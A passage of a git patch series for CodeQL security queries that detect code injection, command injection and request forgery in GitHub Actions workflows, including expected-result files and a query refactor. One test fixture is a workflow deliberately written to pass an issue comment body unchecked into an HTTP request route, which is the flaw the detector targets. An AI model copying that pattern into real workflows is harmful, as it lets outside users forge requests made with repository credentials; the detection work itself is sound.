expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | github.event.issue.title | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | github.event.comment.body | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | github.event.issue.body | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | github.event.issue.title | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | github.event.comment.body | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index d4fd27b18d4f..f852a1b59815 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -3,7 +3,6 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -64,15 +63,10 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | @@ -202,14 +196,10 @@ subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml new file mode 100644 index 000000000000..6937467453b2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml @@ -0,0 +1,10 @@ +on: issue_comment + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: octokit/request-action@v2 + with: + route: ${{ github.event.comment.body }} + diff --git a/ql/test/query-tests/Security/CWE-918/RequestForgery.expected b/ql/test/query-tests/Security/CWE-918/RequestForgery.expected new file mode 100644 index 000000000000..d980139bb357 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-918/RequestForgery.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref new file mode 100644 index 000000000000..fcb4e41daf88 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref @@ -0,0 +1 @@ +Security/CWE-918/RequestForgery.ql From 92dbceb5070bc70b09c182385461ba6f7e056592 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 10:19:08 +0100 Subject: [PATCH 121/707] boost pack versions --- ql/lib/qlpack.yml | 8 ++++---- ql/src/qlpack.yml | 2 +- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a0f348977abb..d211b8fc2baf 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,12 +2,12 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.1 +version: 0.0.2 dependencies: - codeql/controlflow: ^0.1.7 - codeql/yaml: "*" + codeql/controlflow: "*" + codeql/dataflow: "*" codeql/util: "*" - codeql/dataflow: ^0.1.7 + codeql/yaml: "*" dbscheme: yaml.dbscheme extractor: yaml groups: diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index aff53d45ddeb..61ef9d40ab5f 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.1 +version: 0.0.2 groups: - actions - queries From a36ae6a7e2eec938a81ae1a4b54273e81e5b5bea Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 11:07:01 +0100 Subject: [PATCH 122/707] Add `GITHUB_TOKEN` --- action.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/action.yml b/action.yml index a294e9814931..f88e3b078509 100644 --- a/action.yml +++ b/action.yml @@ -24,6 +24,7 @@ runs: - name: Do something with context shell: bash env: + GITHUB_TOKEN: ${{ github.token }} GH_TOKEN: ${{ github.token }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 169e57e87499fbe591a0e2f3d088b4ce68f02632 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 11:10:41 +0100 Subject: [PATCH 123/707] Refactor queries --- .../actions/security/CodeInjectionQuery.qll | 25 ++ .../security/CommandInjectionQuery.qll | 22 ++ .../actions/security/RequestForgeryQuery.qll | 22 ++ ql/lib/ext/TEST-RW-MODELS.model.yml | 2 +- .../Security/CWE-020/CompositeActionsSinks.ql | 12 +- .../CWE-020/ReusableWorkflowsSinks.ql | 12 +- ql/src/Security/CWE-078/CommandInjection.ql | 24 +- .../CWE-078/CriticalCommandInjection.ql | 45 --- .../CWE-078/PrivilegedCommandInjection.ql | 29 ++ ql/src/Security/CWE-094/CodeInjection.ql | 24 +- .../Security/CWE-094/CriticalCodeInjection.ql | 47 --- .../CWE-094/CriticalExpressionInjection.ql | 48 --- .../Security/CWE-094/ExpressionInjection.ql | 42 --- .../CWE-094/PrivilegedCodeInjection.ql | 31 ++ ql/src/Security/CWE-918/RequestForgery.ql | 24 +- .../CWE-078/CriticalCommandInjection.qlref | 1 - ...ed => PrivilegedCommandInjection.expected} | 2 +- .../CWE-078/PrivilegedCommandInjection.qlref | 1 + .../Security/CWE-094/CodeInjection.expected | 272 +++++++++++++++++ .../CWE-094/CriticalCodeInjection.expected | 14 - .../CWE-094/CriticalCodeInjection.qlref | 1 - .../CWE-094/CriticalExpressionInjection.qlref | 1 - .../CWE-094/ExpressionInjection.expected | 276 ------------------ .../CWE-094/ExpressionInjection.qlref | 1 - ...ected => PrivilegedCodeInjection.expected} | 150 +++++----- .../CWE-094/PrivilegedCodeInjection.qlref | 1 + 26 files changed, 501 insertions(+), 628 deletions(-) create mode 100644 ql/lib/codeql/actions/security/CodeInjectionQuery.qll create mode 100644 ql/lib/codeql/actions/security/CommandInjectionQuery.qll create mode 100644 ql/lib/codeql/actions/security/RequestForgeryQuery.qll delete mode 100644 ql/src/Security/CWE-078/CriticalCommandInjection.ql create mode 100644 ql/src/Security/CWE-078/PrivilegedCommandInjection.ql delete mode 100644 ql/src/Security/CWE-094/CriticalCodeInjection.ql delete mode 100644 ql/src/Security/CWE-094/CriticalExpressionInjection.ql delete mode 100644 ql/src/Security/CWE-094/ExpressionInjection.ql create mode 100644 ql/src/Security/CWE-094/PrivilegedCodeInjection.ql delete mode 100644 ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref rename ql/test/query-tests/Security/CWE-078/{CriticalCommandInjection.expected => PrivilegedCommandInjection.expected} (58%) create mode 100644 ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected delete mode 100644 ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected delete mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref rename ql/test/query-tests/Security/CWE-094/{CriticalExpressionInjection.expected => PrivilegedCodeInjection.expected} (70%) create mode 100644 ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll new file mode 100644 index 000000000000..c2453cb1652e --- /dev/null +++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll @@ -0,0 +1,25 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +class CodeInjectionSink extends DataFlow::Node { + CodeInjectionSink() { + exists(Run e | e.getAnScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "code-injection") + } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a code script. + */ +private module CodeInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ +module CodeInjectionFlow = TaintTracking::Global; diff --git a/ql/lib/codeql/actions/security/CommandInjectionQuery.qll b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll new file mode 100644 index 000000000000..8eda87f1cae5 --- /dev/null +++ b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll @@ -0,0 +1,22 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +private class CommandInjectionSink extends DataFlow::Node { + CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a system command. + */ +private module CommandInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a system command. */ +module CommandInjectionFlow = TaintTracking::Global; diff --git a/ql/lib/codeql/actions/security/RequestForgeryQuery.qll b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll new file mode 100644 index 000000000000..80e3d93ee69a --- /dev/null +++ b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll @@ -0,0 +1,22 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +private class RequestForgerySink extends DataFlow::Node { + RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a system command. + */ +private module RequestForgeryConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a system command. */ +module RequestForgeryFlow = TaintTracking::Global; diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml index 7adbcd5adbd1..44897ef3311e 100644 --- a/ql/lib/ext/TEST-RW-MODELS.model.yml +++ b/ql/lib/ext/TEST-RW-MODELS.model.yml @@ -14,4 +14,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "expression-injection"] + - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection"] diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 0ea0713983d3..54f58e6b63ee 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -12,24 +12,16 @@ */ import actions -import codeql.actions.DataFlow +import codeql.actions.security.CodeInjectionQuery import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow -private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { - exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") - } -} - private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { exists(CompositeAction c | c.getAnInput() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } } module MyFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 31fbc1eaae2a..2dd5bf1cfef5 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -12,24 +12,16 @@ */ import actions -import codeql.actions.DataFlow +import codeql.actions.security.CodeInjectionQuery import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow -private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { - exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") - } -} - private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } } module MyFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index bdc341e8caf1..826a3b41e380 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -13,27 +13,11 @@ */ import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.security.CommandInjectionQuery +import CommandInjectionFlow::PathGraph -private class CommandInjectionSink extends DataFlow::Node { - CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink +where CommandInjectionFlow::flowPath(source, sink) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql deleted file mode 100644 index dddbd142873f..000000000000 --- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql +++ /dev/null @@ -1,45 +0,0 @@ -/** - * @name Command built from user-controlled sources - * @description Building a system command from user-controlled sources is vulnerable to insertion of - * malicious code by the user. - * @kind path-problem - * @problem.severity error - * @security-severity 9 - * @precision high - * @id actions/critical-command-injection - * @tags actions - * security - * external/cwe/cwe-078 - */ - -import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow - -private class CommandInjectionSink extends DataFlow::Node { - CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w -where - MyFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - ( - w instanceof ReusableWorkflow or - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) - ) -select sink.getNode(), source, sink, - "Potential critical command injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql new file mode 100644 index 000000000000..6f66535e6a41 --- /dev/null +++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql @@ -0,0 +1,29 @@ +/** + * @name Command built from user-controlled sources on a privileged context + * @description Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the user. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/privileged-command-injection + * @tags actions + * security + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.security.CommandInjectionQuery +import CommandInjectionFlow::PathGraph + +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Workflow w +where + CommandInjectionFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) +select sink.getNode(), source, sink, + "Potential privileged command injection in $@, which may be controlled by an external user.", + sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index 3bac9cec348d..f71c178822cb 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -15,27 +15,11 @@ */ import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.security.CodeInjectionQuery +import CodeInjectionFlow::PathGraph -private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink +where CodeInjectionFlow::flowPath(source, sink) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql deleted file mode 100644 index 64d8a6e43286..000000000000 --- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql +++ /dev/null @@ -1,47 +0,0 @@ -/** - * @name Code injection - * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary - * code execution. - * @kind path-problem - * @problem.severity error - * @security-severity 9 - * @precision high - * @id actions/critical-code-injection - * @tags actions - * security - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 - */ - -import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow - -private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w -where - MyFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - ( - w 